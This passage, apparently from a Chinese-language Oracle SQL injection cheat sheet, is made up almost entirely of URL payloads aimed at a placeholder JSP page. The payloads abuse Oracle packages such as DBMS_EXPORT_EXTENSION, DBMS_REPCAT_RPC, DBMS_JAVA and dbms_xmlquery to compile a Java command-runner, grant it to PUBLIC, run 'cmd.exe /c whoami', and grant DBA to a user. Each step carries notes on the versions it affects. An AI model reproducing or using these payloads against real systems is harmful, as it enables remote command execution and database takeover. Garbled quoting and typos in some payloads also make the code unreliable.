and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””begin dbms_java.grant_permission(”””PUBLIC””””, ””””SYS:java.io.FilePermission””””,””””<>””””, ””””execute””””);end;””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-
 
Create$Functio
 
http://ooo/1.jsp?1=String'’ and (select
 
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”
 
.PUT(:P1);EXECUTE IMMEDIATE
 
”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create
 
or replace function LinxRunCMD(p_cmd in
varchar2) return varchar2 as language java name
 
””””LinxUtil.runCMD(java.lang.String) return String””””;
 
””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-
 
Grant$function$execute$Privilege
 
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null –
 
Execute$OS$Code
 
http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami’) from dual) is not null-
 
使用java的权限
 
影响系统：10g R2, 11g R1 and 11g R2
 
a)       DBMS_JAVA.RUNJAV
 
影响系统:11gR1,11gR2
 
http://ooo/1.jsp?1=String'’ and (SELECT DBMS_JAVA.RUNJAVA (‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST’) FROM DUAL) is not null –
 
b)       DBMS_JAVA_TEST.FUNCAL
 
影响系统：10g R2, 11g R1,11g R2
 
http://ooo/1.jsp?1=String'’ and (Select DBMS_JAVA_TEST.FUNCALL (‘oracle/aurora/util/Wrapper’,'main’,'c:\\windows\\system32\\cmd.exe’,'/c’,'dir>c:\\OUT2.LST’) FROM DUAL) is not null—
 
DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
 
影响系统：Oracle 8, 9,10g R1, 10g R2, 11g R1
 
-
 
1. Create Library
 
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str+=stemp+”\n”;myReader.close();return str;} catch (Exception e){returne.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+”\n”;myReader.close();return str;} catch (Exception e){return e.toString();}}}””;END;”;END;–‘,’CCCCC’) from dual) is not null-
 
2. Granting JAVA permissions
 
http://www.2cto.com /1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ””””LinxUtil.runCMD(java.lang.String) return String””””;””;END;”;END;–’,'CCCCC’) from dual) is not null –
 
3. Making  function  executable  by  PUBLIC
 
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–‘,’CCCCC’) from dual) is not null –
 
4. Executing  OS  Code
 
http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami ‘) from dual) is not null –
 
打补丁后的：需要CREATE  PROCEDURE权限
 
1.Create Function
 
http://www.2cto.com /default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ”create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ””grant dba to scott””;commit;return ””z””;END; ”; commit; end;’) from dual) is not null –
 
2. Exploiting SYS.L
 
http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ” begin SYS.LT.CREATEWORKSPACE(””A10”””” and scott.pwn2()=””””x””); YS.LT.REMOVEWORKSPACE(””A10”””” and scott.pwn2()=””””x””);end;”; commit; end;’) from dual) is not null –
 
Let’s look at CPU of October 2010 (vulnerable versions 10gR1, 10gR2, 11g R1 and 11gR2) and look at the vulnerability in package sys.dbms_cdc_publish.create_change_set which allows a user with EXECUTE_CATALOG_ROLE privilege to become DBA.
 
http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMAAUTONOMOUS_TRANSACTION